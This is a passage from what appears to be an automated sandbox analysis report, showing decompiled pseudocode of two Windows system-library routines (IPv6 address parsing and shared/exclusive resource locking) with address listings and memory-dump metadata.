                                                                                                                                                        			E00920B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E008F8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E008EDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00920CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00920CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009206BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009206BA(_t135, _t178) == 0 || E00920A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00920CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00920CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009206BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009206BA(_t124, _t142) == 0 || E00920A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                        0x00920b21
                                                                                                                                                        0x00920b24
                                                                                                                                                        0x00920b27
                                                                                                                                                        0x00920b2a
                                                                                                                                                        0x00920b2d
                                                                                                                                                        0x00920b30
                                                                                                                                                        0x00920b33
                                                                                                                                                        0x00920b36
                                                                                                                                                        0x00920b39
                                                                                                                                                        0x00920b3e
                                                                                                                                                        0x00920c65
                                                                                                                                                        0x00920c68
                                                                                                                                                        0x00920c6a
                                                                                                                                                        0x00920c6f
                                                                                                                                                        0x0094eb42
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb48
                                                                                                                                                        0x0094eb48
                                                                                                                                                        0x00920c75
                                                                                                                                                        0x00920c7a
                                                                                                                                                        0x0094eb54
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb5a
                                                                                                                                                        0x00920c80
                                                                                                                                                        0x00920c84
                                                                                                                                                        0x0094eb98
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eba6
                                                                                                                                                        0x00920cb8
                                                                                                                                                        0x00920cba
                                                                                                                                                        0x00920cd3
                                                                                                                                                        0x00920cda
                                                                                                                                                        0x00920ce4
                                                                                                                                                        0x00920ce9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920cec
                                                                                                                                                        0x00920c8c
                                                                                                                                                        0x0094eb63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb70
                                                                                                                                                        0x0094eb75
                                                                                                                                                        0x0094eb7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb8c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb8c
                                                                                                                                                        0x00920c96
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920ca2
                                                                                                                                                        0x00920cac
                                                                                                                                                        0x00920cb4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b44
                                                                                                                                                        0x00920b47
                                                                                                                                                        0x00920b49
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b4f
                                                                                                                                                        0x00920b50
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b56
                                                                                                                                                        0x00920b62
                                                                                                                                                        0x00920b7c
                                                                                                                                                        0x00920bac
                                                                                                                                                        0x00920a0f
                                                                                                                                                        0x0094eaaa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eac4
                                                                                                                                                        0x0094eac4
                                                                                                                                                        0x00920bd0
                                                                                                                                                        0x00920bd0
                                                                                                                                                        0x00920bd4
                                                                                                                                                        0x00920bd9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920bdb
                                                                                                                                                        0x00920be0
                                                                                                                                                        0x0094eb0e
                                                                                                                                                        0x00920a1a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920a1a
                                                                                                                                                        0x0094eb1a
                                                                                                                                                        0x0094eb1f
                                                                                                                                                        0x0094eb27
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb36
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb36
                                                                                                                                                        0x00920bea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920bf6
                                                                                                                                                        0x00920c00
                                                                                                                                                        0x00920c03
                                                                                                                                                        0x00920c0b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920c0b
                                                                                                                                                        0x0094eaaa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920a15
                                                                                                                                                        0x00920bb6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920bc6
                                                                                                                                                        0x00920bc6
                                                                                                                                                        0x00920bcb
                                                                                                                                                        0x00920c15
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920c1d
                                                                                                                                                        0x00920c20
                                                                                                                                                        0x00920c21
                                                                                                                                                        0x00920c24
                                                                                                                                                        0x00920c24
                                                                                                                                                        0x00920c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920c26
                                                                                                                                                        0x00920bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920bcd
                                                                                                                                                        0x00920b89
                                                                                                                                                        0x00920b89
                                                                                                                                                        0x00920b90
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b96
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b96
                                                                                                                                                        0x00920a04
                                                                                                                                                        0x00920a04
                                                                                                                                                        0x00920b9a
                                                                                                                                                        0x00920b9a
                                                                                                                                                        0x00920b9b
                                                                                                                                                        0x00920b9f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920ba5
                                                                                                                                                        0x00920ac7
                                                                                                                                                        0x00920aca
                                                                                                                                                        0x0094eacf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eade
                                                                                                                                                        0x0094eade
                                                                                                                                                        0x0094eae3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eaf3
                                                                                                                                                        0x0094eaf6
                                                                                                                                                        0x0094eaf7
                                                                                                                                                        0x0094eafe
                                                                                                                                                        0x0094eb01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb01
                                                                                                                                                        0x0094eacf
                                                                                                                                                        0x00920ad0
                                                                                                                                                        0x00920ad4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920ada
                                                                                                                                                        0x00920ae6
                                                                                                                                                        0x00920c34
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920c47
                                                                                                                                                        0x00920c49
                                                                                                                                                        0x00920c4a
                                                                                                                                                        0x00920c4e
                                                                                                                                                        0x00920c51
                                                                                                                                                        0x00920c54
                                                                                                                                                        0x00920c57
                                                                                                                                                        0x00920c5a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920c60
                                                                                                                                                        0x00920afb
                                                                                                                                                        0x00920afe
                                                                                                                                                        0x00920b02
                                                                                                                                                        0x00920b05
                                                                                                                                                        0x00920b08
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b08
                                                                                                                                                        0x00920ae6
                                                                                                                                                        0x00920b44
                                                                                                                                                        0x009209f8
                                                                                                                                                        0x009209f8
                                                                                                                                                        0x009209f9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eaa0
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID: .$:$:
                                                                                                                                                        • API String ID: 3965848254-2308638275
                                                                                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction ID: e7518ee24c2a4bf2819fd4e7c2a167ef7b5dd7bafd6ddcd47e9d4fd54f6df8fb
                                                                                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction Fuzzy Hash: 1DA18DB1D0032ADFDF24CF64E8456BEB7B8BBD5304F24856AD482A724BD6349A41CB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00920554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                        			E00920554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009c01c0;
									_push(_t144);
									_push(0);
									_t51 = E008DF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00924FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00933F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0096217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00933F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00923915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009c01c0;
												_push(_t138);
												_push(0);
												_t58 = E008DF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00924FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0096217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00933F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00923915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00905384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E008DF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00923915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E008DF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00923915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E008DF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00923915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00905329(_t110, _t138);
																_t69 = E009053A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                        0x0092055a
                                                                                                                                                        0x0092055d
                                                                                                                                                        0x00920563
                                                                                                                                                        0x00920566
                                                                                                                                                        0x009205d8
                                                                                                                                                        0x009205e2
                                                                                                                                                        0x009205e5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009205e7
                                                                                                                                                        0x009205e7
                                                                                                                                                        0x009205ea
                                                                                                                                                        0x009205f3
                                                                                                                                                        0x009205f3
                                                                                                                                                        0x00920568
                                                                                                                                                        0x00920568
                                                                                                                                                        0x00920568
                                                                                                                                                        0x00920569
                                                                                                                                                        0x00920569
                                                                                                                                                        0x00920569
                                                                                                                                                        0x0092056b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094217f
                                                                                                                                                        0x00942183
                                                                                                                                                        0x0094225b
                                                                                                                                                        0x0094225f
                                                                                                                                                        0x00942189
                                                                                                                                                        0x0094218c
                                                                                                                                                        0x0094218f
                                                                                                                                                        0x00942194
                                                                                                                                                        0x00942199
                                                                                                                                                        0x0094219d
                                                                                                                                                        0x009421a0
                                                                                                                                                        0x009421a2
                                                                                                                                                        0x009421ce
                                                                                                                                                        0x009421ce
                                                                                                                                                        0x009421ce
                                                                                                                                                        0x009421d0
                                                                                                                                                        0x009421d6
                                                                                                                                                        0x009421de
                                                                                                                                                        0x009421e2
                                                                                                                                                        0x009421e8
                                                                                                                                                        0x009421e9
                                                                                                                                                        0x009421ec
                                                                                                                                                        0x009421f1
                                                                                                                                                        0x009421f6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009421f8
                                                                                                                                                        0x009421fb
                                                                                                                                                        0x00942206
                                                                                                                                                        0x0094220b
                                                                                                                                                        0x0094220c
                                                                                                                                                        0x00942217
                                                                                                                                                        0x00942226
                                                                                                                                                        0x0094222b
                                                                                                                                                        0x0094222c
                                                                                                                                                        0x0094222f
                                                                                                                                                        0x00942232
                                                                                                                                                        0x00942235
                                                                                                                                                        0x00942235
                                                                                                                                                        0x0094223a
                                                                                                                                                        0x0094223f
                                                                                                                                                        0x00942241
                                                                                                                                                        0x00942243
                                                                                                                                                        0x00942248
                                                                                                                                                        0x00942248
                                                                                                                                                        0x0094224d
                                                                                                                                                        0x0094224f
                                                                                                                                                        0x00942262
                                                                                                                                                        0x00942263
                                                                                                                                                        0x00942268
                                                                                                                                                        0x00942269
                                                                                                                                                        0x00942269
                                                                                                                                                        0x00942269
                                                                                                                                                        0x0094226d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942276
                                                                                                                                                        0x00942279
                                                                                                                                                        0x0094227e
                                                                                                                                                        0x00942283
                                                                                                                                                        0x00942287
                                                                                                                                                        0x0094228a
                                                                                                                                                        0x0094228d
                                                                                                                                                        0x0094228f
                                                                                                                                                        0x009422bc
                                                                                                                                                        0x009422bc
                                                                                                                                                        0x009422bc
                                                                                                                                                        0x009422be
                                                                                                                                                        0x009422c4
                                                                                                                                                        0x009422cc
                                                                                                                                                        0x009422d0
                                                                                                                                                        0x009422d6
                                                                                                                                                        0x009422d7
                                                                                                                                                        0x009422da
                                                                                                                                                        0x009422df
                                                                                                                                                        0x009422e4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422e6
                                                                                                                                                        0x009422e9
                                                                                                                                                        0x009422f4
                                                                                                                                                        0x009422f9
                                                                                                                                                        0x009422fa
                                                                                                                                                        0x00942305
                                                                                                                                                        0x00942314
                                                                                                                                                        0x00942319
                                                                                                                                                        0x0094231a
                                                                                                                                                        0x0094231d
                                                                                                                                                        0x00942320
                                                                                                                                                        0x00942323
                                                                                                                                                        0x00942323
                                                                                                                                                        0x00942328
                                                                                                                                                        0x0094232d
                                                                                                                                                        0x0094232f
                                                                                                                                                        0x00942331
                                                                                                                                                        0x00942336
                                                                                                                                                        0x00942336
                                                                                                                                                        0x0094233b
                                                                                                                                                        0x0094233d
                                                                                                                                                        0x00942350
                                                                                                                                                        0x00942351
                                                                                                                                                        0x00942356
                                                                                                                                                        0x00942359
                                                                                                                                                        0x00942359
                                                                                                                                                        0x0094235b
                                                                                                                                                        0x0094235d
                                                                                                                                                        0x00905367
                                                                                                                                                        0x0090536b
                                                                                                                                                        0x00905372
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942363
                                                                                                                                                        0x00942363
                                                                                                                                                        0x00942369
                                                                                                                                                        0x0094236a
                                                                                                                                                        0x0094236c
                                                                                                                                                        0x00942371
                                                                                                                                                        0x00942373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00942379
                                                                                                                                                        0x00942379
                                                                                                                                                        0x0094237a
                                                                                                                                                        0x0094237f
                                                                                                                                                        0x0094237f
                                                                                                                                                        0x00942385
                                                                                                                                                        0x00942386
                                                                                                                                                        0x00942389
                                                                                                                                                        0x0094238e
                                                                                                                                                        0x00942390
                                                                                                                                                        0x00905378
                                                                                                                                                        0x0090537c
                                                                                                                                                        0x00942396
                                                                                                                                                        0x00942396
                                                                                                                                                        0x00942397
                                                                                                                                                        0x0094239c
                                                                                                                                                        0x009423a2
                                                                                                                                                        0x009423a3
                                                                                                                                                        0x009423a6
                                                                                                                                                        0x009423ab
                                                                                                                                                        0x009423ad
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009423b3
                                                                                                                                                        0x009423b3
                                                                                                                                                        0x009423b4
                                                                                                                                                        0x009423b9
                                                                                                                                                        0x009423ba
                                                                                                                                                        0x009423ba
                                                                                                                                                        0x009423bc
                                                                                                                                                        0x009423bf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939153
                                                                                                                                                        0x00939158
                                                                                                                                                        0x0093915a
                                                                                                                                                        0x0093915e
                                                                                                                                                        0x00939160
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939166
                                                                                                                                                        0x00939166
                                                                                                                                                        0x00939171
                                                                                                                                                        0x00939176
                                                                                                                                                        0x00939176
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00939160
                                                                                                                                                        0x009423c6
                                                                                                                                                        0x009423ce
                                                                                                                                                        0x009423d7
                                                                                                                                                        0x009423d7
                                                                                                                                                        0x009423ad
                                                                                                                                                        0x00942390
                                                                                                                                                        0x00942373
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094233f
                                                                                                                                                        0x00942291
                                                                                                                                                        0x00942291
                                                                                                                                                        0x00942293
                                                                                                                                                        0x00942295
                                                                                                                                                        0x0094229a
                                                                                                                                                        0x009422a1
                                                                                                                                                        0x009422a3
                                                                                                                                                        0x009422a7
                                                                                                                                                        0x009422a9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422ab
                                                                                                                                                        0x009422ad
                                                                                                                                                        0x009422af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422af
                                                                                                                                                        0x009422b1
                                                                                                                                                        0x009422b4
                                                                                                                                                        0x009422b4
                                                                                                                                                        0x009422b6
                                                                                                                                                        0x009053be
                                                                                                                                                        0x009053be
                                                                                                                                                        0x009053be
                                                                                                                                                        0x009053c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009053cb
                                                                                                                                                        0x009053ce
                                                                                                                                                        0x009053d0
                                                                                                                                                        0x009053d4
                                                                                                                                                        0x009053d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009053d8
                                                                                                                                                        0x009053e3
                                                                                                                                                        0x009053ea
                                                                                                                                                        0x009053ea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009053d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x009422b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094228f
